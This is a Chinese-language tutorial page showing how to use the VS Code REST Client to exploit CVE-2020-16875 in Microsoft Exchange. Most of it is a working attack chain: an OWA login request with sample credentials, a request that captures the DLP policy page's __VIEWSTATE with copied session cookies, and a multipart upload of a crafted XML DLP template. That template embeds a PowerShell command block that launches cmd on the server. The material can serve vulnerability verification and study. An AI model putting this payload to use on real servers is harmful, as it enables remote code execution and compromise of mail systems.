您好,登錄后才能下訂單哦!
這篇文章主要介紹“怎么使用vscode rest client分析CVE-2020-16875漏洞”,在日常操作中,相信很多人在怎么使用vscode rest client分析CVE-2020-16875漏洞問題上存在疑惑,小編查閱了各式資料,整理出簡單好用的操作方法,希望對大家解答”怎么使用vscode rest client分析CVE-2020-16875漏洞”的疑惑有所幫助!接下來,請跟著小編一起來學(xué)習(xí)吧!
@target=target @username=info2002 @password=123456abc
## 觸發(fā)RCE 的一個前提,是需要有一個可以登錄的賬號密碼。 ## 登錄成功,返回一個 302 跳轉(zhuǎn),Location 地址為 https://{{target}}/owa ## 自己拷貝返回的cookie,留著下一步使用 POST https://{{target}}/owa/auth.owa Content-Type: application/x-www-form-urlencoded destination=https://{{target}}/owa&flags=&username={{username}}&password={{password}}&forcedownlevel=0&passwordText=&isUtf8=1
### 注意添加 cookie 信息,cookie 來自上一步的返回 ### POST 返回一個提交DLP策略的頁面,其中包含一個 上傳xml 頁面的表單。 ### RCE 觸發(fā)的關(guān)鍵,也是上傳一個構(gòu)建好的xml ### 搜索 __VIEWSTATE 表單,找到后邊的value備用 POST https://{{target}}/ecp/DLPPolicy/ManagePolicyFromISV.aspx Cookie: cadata=PNFf9JJYWv0YzkoX5j6QkPv8joj1HGPxf+y5Qv8HuWCTH0aU8z3dCjjan55k8a6PCKn5EdyZJODa2xaVXd26v0ctAWb9M6HR00K0ox5G0bc=; path=/; secure; HttpOnly,cadataTTL=d6qg8liD1i8O8eDQG6dihg==; path=/; secure; HttpOnly,cadataKey=f7uGUtHEafk0woO1GxggVfWuqzLNXJCa51DcVRzzJLYXKByQJubmtzx3WDGrKoLOQyDVt11c4EtBYIQHPXojnLulHRU8fdqoZLCQoPQm6hlxS3XxKBVwZlXMig1UpRCufLLVpvKuVPVdcl54H2mOB0mqlyryTIETcvBP5Amf/3f1abY3De72kva9VSY6m/ETgnjAxA8XpXyipaYBTG87Rq9OZGszXeIxNGAZ6ZA7wfzEQ0BvG+pVFqeYxhXnm3BnYo+6JGuV5X3+kR1hjyLK12AzDR+3fdkOar0xTwkON6fp44PxcqxHMhCDAtCHCD1NEv8wlJzcE8ze614rV+q8zQ==; path=/; secure; HttpOnly,cadataIV=ctnfcTb/AroSCXjUeyq7OYe2GvlksJYDTlmVv6ushP0ai+6/EtfwnaP2imYOhylwIAI1uhh+YFVNghyNaZ51P6w3RCPAJ+RzpUC+AhsxKVs1A9YL8U64hyMe6LkKz/1QqQG+AMot/DYKpqOw3LKnVXsyxJ7XA84G7NjGPQRu4/TQ/e3BaJgSp3QSfnRjQJ9nkbeIKN/iz/vT3nwLw5MIhueTVb3qvXP2YdEJ7JQcEnSuHN/ggwA5AkXzxDClj/DKntFx7f8DduYhQ+SAAOz0QAs4eu954PIVVJiAvb+PMvqJWbCx2/f7prO6u8nyjJz+j3poOV+EmdtFy77DjAB/w==; path=/; secure; HttpOnly,cadataSig=pkEzUP6+8+ugbBpiNxji+eTVagD/JROaWaKO+e3Nsszri6f+xM7eI5oiOGU637ENE8HgW65EKWIyqwjagSIo60PF0mLvSLKGAKCbhlVU7zX0cVlBeYYBidQhnxYV8KflCBJIL9MbDQ9emwH/HdOBS48JJALybzZ/nIiQeIfJsz0ycQS2DUrUCj2qHqDeXDnqrzGNpDtdeNoe0ADc2zm/bKl59N9YgQkYNuz1OArknrhmj/H0FwDUiEB38cg4I+ckZypvVJwMX1V5rG3Csml7BVgMWaDbo6PP9RYALLF28IxhQ62tDgkXn8ltGcdlo7hdWvGvjEfH1I0s5CuT7qwnEw==; path=/; secure; HttpOnly
### 同理 cookie 信息,不能丟。 拿著第二步的 viewstate 信息構(gòu)建惡意的xml,完成RCE. ### 不建議執(zhí)行這一步 ,觸發(fā)你能確保你的服務(wù)器的環(huán)境不受影響。 ### 基本上到第二步就已經(jīng)可以確認會包含RCE 漏洞了。 POST https://{{target}}/ecp/DLPPolicy/ManagePolicyFromISV.aspx Cookie: cadata=PNFf9JJYWv0YzkoX5j6QkPv8joj1HGPxf+y5Qv8HuWCTH0aU8z3dCjjan55k8a6PCKn5EdyZJODa2xaVXd26v0ctAWb9M6HR00K0ox5G0bc=; path=/; secure; HttpOnly,cadataTTL=d6qg8liD1i8O8eDQG6dihg==; path=/; secure; HttpOnly,cadataKey=f7uGUtHEafk0woO1GxggVfWuqzLNXJCa51DcVRzzJLYXKByQJubmtzx3WDGrKoLOQyDVt11c4EtBYIQHPXojnLulHRU8fdqoZLCQoPQm6hlxS3XxKBVwZlXMig1UpRCufLLVpvKuVPVdcl54H2mOB0mqlyryTIETcvBP5Amf/3f1abY3De72kva9VSY6m/ETgnjAxA8XpXyipaYBTG87Rq9OZGszXeIxNGAZ6ZA7wfzEQ0BvG+pVFqeYxhXnm3BnYo+6JGuV5X3+kR1hjyLK12AzDR+3fdkOar0xTwkON6fp44PxcqxHMhCDAtCHCD1NEv8wlJzcE8ze614rV+q8zQ==; path=/; secure; HttpOnly,cadataIV=ctnfcTb/AroSCXjUeyq7OYe2GvlksJYDTlmVv6ushP0ai+6/EtfwnaP2imYOhylwIAI1uhh+YFVNghyNaZ51P6w3RCPAJ+RzpUC+AhsxKVs1A9YL8U64hyMe6LkKz/1QqQG+AMot/DYKpqOw3LKnVXsyxJ7XA84G7NjGPQRu4/TQ/e3BaJgSp3QSfnRjQJ9nkbeIKN/iz/vT3nwLw5MIhueTVb3qvXP2YdEJ7JQcEnSuHN/ggwA5AkXzxDClj/DKntFx7f8DduYhQ+SAAOz0QAs4eu954PIVVJiAvb+PMvqJWbCx2/f7prO6u8nyjJz+j3poOV+EmdtFy77DjAB/w==; path=/; secure; HttpOnly,cadataSig=pkEzUP6+8+ugbBpiNxji+eTVagD/JROaWaKO+e3Nsszri6f+xM7eI5oiOGU637ENE8HgW65EKWIyqwjagSIo60PF0mLvSLKGAKCbhlVU7zX0cVlBeYYBidQhnxYV8KflCBJIL9MbDQ9emwH/HdOBS48JJALybzZ/nIiQeIfJsz0ycQS2DUrUCj2qHqDeXDnqrzGNpDtdeNoe0ADc2zm/bKl59N9YgQkYNuz1OArknrhmj/H0FwDUiEB38cg4I+ckZypvVJwMX1V5rG3Csml7BVgMWaDbo6PP9RYALLF28IxhQ62tDgkXn8ltGcdlo7hdWvGvjEfH1I0s5CuT7qwnEw==; path=/; secure; HttpOnly Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="ctl00$ResultPanePlaceHolder$senderBtn" ResultPanePlaceHolder_ButtonsPanel_btnNext ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="__VIEWSTATE" /wEPDwUILTg5MDAzMDFkZKEgV4rq2832c5ZF38whYPpaizHg ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="ctl00$ResultPanePlaceHolder$contentContainer$name" anytexthere ------WebKitFormBoundary7MA4YWxkTrZu0gW Content-Disposition: form-data; name="ctl00$ResultPanePlaceHolder$contentContainer$upldCtrl"; filename="rce.xml" Content-Type: < ./rce.xml ------WebKitFormBoundary7MA4YWxkTrZu0gW--
<?xml version="1.0" encoding="UTF-8"?> <dlpPolicyTemplates> <dlpPolicyTemplate id="F7C29AEC-A52D-4502-9670-141424A83FAB" mode="Audit" state="Enabled" version="15.0.2.0"> <contentVersion>4</contentVersion> <publisherName>si</publisherName> <name> <localizedString lang="en"></localizedString> </name> <description> <localizedString lang="en"></localizedString> </description> <keywords></keywords> <ruleParameters></ruleParameters> <policyCommands> <commandBlock> <![CDATA[ $i=New-object System.Diagnostics.ProcessStartInfo;$i.UseShellExecute=$true;$i.FileName="cmd";$i.Arguments="/c mspaint";$r=New-Object System.Diagnostics.Process;$r.StartInfo=$i;$r.Start() ]]> </commandBlock> </policyCommands> <policyCommandsResources></policyCommandsResources> </dlpPolicyTemplate> </dlpPolicyTemplates>
到此,關(guān)于“怎么使用vscode rest client分析CVE-2020-16875漏洞”的學(xué)習(xí)就結(jié)束了,希望能夠解決大家的疑惑。理論與實踐的搭配能更好的幫助大家學(xué)習(xí),快去試試吧!若想繼續(xù)學(xué)習(xí)更多相關(guān)知識,請繼續(xù)關(guān)注億速云網(wǎng)站,小編會繼續(xù)努力為大家?guī)砀鄬嵱玫奈恼拢?/p>
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。